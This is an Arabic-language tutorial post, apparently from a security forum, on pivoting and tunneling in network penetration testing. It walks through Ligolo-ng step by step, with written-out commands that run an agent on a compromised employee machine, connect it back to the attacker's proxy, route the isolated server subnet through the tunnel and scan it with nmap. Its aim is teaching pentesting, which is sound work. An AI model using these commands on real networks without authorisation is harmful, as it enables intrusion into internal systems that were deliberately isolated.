- بواسطة x32x01 ||
🛡️ يعني إيه Pivoting و Tunneling في اختبار الاختراق؟
في اختبار اختراق الشبكات، أول ما توصل لجهاز واحد جوه شبكة الشركة، كده انت لسه في أول الطريق 😒🚂
المرحلة دي تعتبر أخطر مرحلة، لأن الأنظمة المهمة مش بتكون على نفس الشبكة، وغالبًا بتكون محبوسة جوه شبكات داخلية معزولة.
هنا بيظهر دور Pivoting و Tunneling، وهما اللي بيخلّوا اختبار الاختراق حقيقي وقريب جدًا من سيناريو هجوم واقعي 🔥
تحميل الأداة من GitHub (هتلاقيها بسهولة)
📌 كده الخادم شغال ومستني اتصال على البورت 11601
1️⃣ اختار الجلسة
2️⃣ ابدأ النفق
أول ما تثبت إن: جهاز واحد ممكن يبقى بوابة لباقي الشبكة
ساعتها الاختبار يتحوّل من شغل تقني إلى قيمة أمنية حقيقية تساعد الشركة تقفل الثغرات قبل ما هاكر حقيقي يستغلها 🚨
في اختبار اختراق الشبكات، أول ما توصل لجهاز واحد جوه شبكة الشركة، كده انت لسه في أول الطريق 😒🚂
المرحلة دي تعتبر أخطر مرحلة، لأن الأنظمة المهمة مش بتكون على نفس الشبكة، وغالبًا بتكون محبوسة جوه شبكات داخلية معزولة.
هنا بيظهر دور Pivoting و Tunneling، وهما اللي بيخلّوا اختبار الاختراق حقيقي وقريب جدًا من سيناريو هجوم واقعي 🔥
🔑 الفكرة ببساطة ومن غير تعقيد
خلّيك فاكرها كده 👇- Pivoting 🧭
يعني تستخدم الجهاز اللي اخترقته كنقطة عبور توصلك لشبكات أو أنظمة تانية مش باينالك من بره. - Tunneling 🚇
يعني تعمل قناة اتصال تعدي من الجهاز ده، وتخليك تتعامل مع الشبكة الداخلية كأنك قاعد جواها.
تشبيه سريع:
- Pivoting = تختار الطريق جوه مدينة مقفولة
- Tunneling = النفق اللي بيعديك في الطريق ده
⏰ إمتى نحتاج Pivoting فعلًا؟
السيناريو ده بيحصل كتير جدًا لما:- الشبكة تكون متقسمة (Users / Servers / DMZ)
- في Firewall أو ACL مانعين الوصول المباشر
- الخدمات الحساسة تكون داخلية بس زي:
- لوحات تحكم
- أنظمة HR
- File Servers
- Databases
🏢 مثال عملي على شبكة شركة
خلّينا نفترض إن الشركة عندها:- شبكة الموظفين: 192.168.1.0/24
- شبكة الخوادم: 10.0.0.0/24 (معزولة تمامًا عن الإنترنت)
الوضع الحالي:
- انت كمختبر خارجي ❌ مش شايف شبكة الخوادم
- اخترقت جهاز موظف: 192.168.1.50
- الجهاز ده يقدر يوصل لشبكة الخوادم من جوه
⚙️ التطبيق العملي خطوة بخطوة باستخدام Ligolo-ng
أداة Ligolo-ng من أقوى الأدوات في الـ Pivoting و Tunneling 💣🟢 الخطوة 1: تجهيز الأداة
على جهازك (المهاجم)تحميل الأداة من GitHub (هتلاقيها بسهولة)
🟢 الخطوة 2: تشغيل الخادم
على جهازك (المهاجم):sudo ./proxy -selfcert📌 كده الخادم شغال ومستني اتصال على البورت 11601
🟢 الخطوة 3: تشغيل العميل على الجهاز المخترق
على جهاز الموظف المخترق 192.168.1.50:./agent -connect IP_جهازك:11601 -ignore-cert🟢 الخطوة 4: تفعيل النفق
بعد ما الاتصال يتم:1️⃣ اختار الجلسة
session 12️⃣ ابدأ النفق
start🟢 الخطوة 5: إضافة مسار شبكة الخوادم
على جهازك (المهاجم):sudo ip route add 10.0.0.0/24 dev ligolo✅ النتيجة النهائية
دلوقتي انت تقدر 💪:- توصل لشبكة 10.0.0.0/24 مباشرة
- تعمل Scan:
nmap 10.0.0.0/24 - تدخل على أي خدمة جوه الشبكة كأنك واحد من الموظفين 👀
🔥 ليه Pivoting و Tunneling مهمين جدًا؟
Pivoting & Tunneling مش رفاهية ولا تقنيات متقدمة وخلاص، دول قلب اختبار اختراق الشبكات الحقيقي ❤️🔥أول ما تثبت إن: جهاز واحد ممكن يبقى بوابة لباقي الشبكة
ساعتها الاختبار يتحوّل من شغل تقني إلى قيمة أمنية حقيقية تساعد الشركة تقفل الثغرات قبل ما هاكر حقيقي يستغلها 🚨